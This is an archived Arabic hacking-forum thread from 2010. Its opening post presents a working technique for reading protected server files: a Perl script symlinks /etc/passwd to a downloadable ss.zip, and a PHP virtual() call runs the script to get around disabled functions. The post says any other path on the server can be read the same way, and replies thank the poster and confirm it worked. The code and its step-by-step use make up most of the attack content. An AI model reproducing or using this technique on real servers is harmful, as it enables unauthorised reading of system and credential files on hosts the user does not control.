:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   [حصريآ]تشغيل البيرل بأحد دوال php (http://www.vbspiders.com/vb/t30450.html)

S4udi h4ck 06-12-2010 05:28 AM
[حصريآ]تشغيل البيرل بأحد دوال php
 
1 مرفق
السلام عليكم ورحمة الله وبركاته

كيف الحال ياعيال إن شاء الله بخير ...

 دالة virtual

هالطريقه نادر اللي يعرفها ويمكن محد فكر فيها و الطريقه من اكتشافي و استنتاجي

طبعاً راح نشغل البيرل ليس مثل ملف cgi-telnet او اي شيل ثاني بالبيرل

 هالدالة تشغل اي كود بيرل يطبع امر ماء على الصفحة وهو طبعاً يستفاد بالسيرفر لتنسيق html

لأصحاب تطوير المواقع و برمجة السكربتات ونادر بالمره انك تلقى سيرفرات حاطه الدالة من ضمن

الدوال الغير مفعله ...

راح اعطيكم كود تضعونه بملف بيرل


كود PHP:
[html] #!/usr/bin/perl -w


$target="/etc/passwd";


$distension ="ss.zip";


print "Content-type: ****/html\n\n";


print '<**** ****="#C0C0C0" bgcolor="#000000">';


$symlink = symlink($target,$distension);


if($symlink == 1) { print " $distension Symlink Created Successfully . . ."; }


else { print "Cannot Symlink File or File $distension Already Exists[/html] . . ."; }




زي ماهو مبين بكود البيرل أنه راح ينشىء اختصار عن طريق Symlink

لملف /etc/passwd بملف اسمه ss.zip

ترفعه على السيرفر وطبعاً اعطاءه تصريح 755 وعطيناه اسم ss.pl

وتنشأ ملف php بإستخدام دالة virtual

 كود PHP:
<?php


virtual("./ss.pl");


?>

ارفع ملف الـ php على نفس مسار ملف البيرل

وافتحه من المتصفح وراح يجيك نفس اللي بهالصوره

http://www.mlfnt.com/up_6_2010/12763114361.jpg

راح يقول

ss.zip Symlink Created Successfully

حمل ملف ss.zip وافتحه عن طريق المفكره (Notepad) وراح تلقى محتوى /etc/passwd

الملف في المرافقه

بإمكانك تغير المسار إلى اي مسار اخر تبي تقرأه على السيرفر ...

و أيضاً تستطيع إستعمال دوال اخرى للبيرل ...

و إن شاء الله يكون الشرح مفهوم للجميع ..

أهداء الي منظمة : kala$nikoV
smilies15

و بالتوفيق ...
G0D-FaTH3R

KaLa$nikoV 06-12-2010 05:51 AM
مشكور ع الشرح الرائع

من بعد اذنك اسمح لي باضافه


(الشرح هو تخطي عباره عن عمليه سحب ملفات ع السيرفر من خلال
دوال لغه perl )

شكرا ع الاهداء والشرح

++ تقيم

z3r0 b0mb3r 06-12-2010 03:08 PM
مشكورررررررررررررررررررررررررررررررر أخي بارك الله فيك
لك مني أجمل تحية

H3x HaCkeR 06-12-2010 04:23 PM
]يعطيك العافيه

معاني الفراق 06-15-2010 02:09 PM
يابطل واصل مجهودك

Xa7m3d 06-17-2010 06:45 PM
مشكور يالغالي وتم التجربة بنجاح لكن اخي اسمحلي اصحح العنوان لانو مفهوم الفكرة لا ينطبق ع العنوان بمعنى مش انك تشغل البيرل نفسه من خلال هالدالة فقط هو انك تسحب ملفات من السرفر لايمكن قرائته وهده شغلة يمكن نستفيد منها احيانا مشكور مجدداا وبالتوفيق للجميع

S4udi h4ck 11-28-2010 07:24 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة KaLa$nikoV (المشاركة 149943)
مشكور ع الشرح الرائع

من بعد اذنك اسمح لي باضافه


(الشرح هو تخطي عباره عن عمليه سحب ملفات ع السيرفر من خلال
دوال لغه perl )

شكرا ع الاهداء والشرح

++ تقيم

حبيبي تمون يا غالي اذا في خلط انت تصلح لي دايم هههههههههه حبيبي والله smilies18

S4udi h4ck 11-28-2010 07:25 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة DZr3d (المشاركة 150087)
مشكورررررررررررررررررررررررررررررررر أخي بارك الله فيك
لك مني أجمل تحية

منور حبيبي يا هلا ومرحب كل يوم تعال هع smilies2

S4udi h4ck 11-28-2010 07:25 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة H3x HaCkeR (المشاركة 150139)
]يعطيك العافيه


الله يعافيك يا شنب حيآك الله :a19:

S4udi h4ck 11-28-2010 07:26 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة معاني الفراق (المشاركة 151975)
يابطل واصل مجهودك

منور يا غالي حيآك الله prayer

S4udi h4ck 11-28-2010 07:27 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة Xa7m3d (المشاركة 153541)
مشكور يالغالي وتم التجربة بنجاح لكن اخي اسمحلي اصحح العنوان لانو مفهوم الفكرة لا ينطبق ع العنوان بمعنى مش انك تشغل البيرل نفسه من خلال هالدالة فقط هو انك تسحب ملفات من السرفر لايمكن قرائته وهده شغلة يمكن نستفيد منها احيانا مشكور مجدداا وبالتوفيق للجميع


مشكور حبيبي على انتباهك على موضوع والتدقيق فيه وانا والله ناسي ياعزوتي الاخ فولكانو ما قصر يا غالي

منور يا غالي :a41:

jamcool003 12-02-2010 12:10 AM
merciiiiiiiiii


الساعة الآن 03:57 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0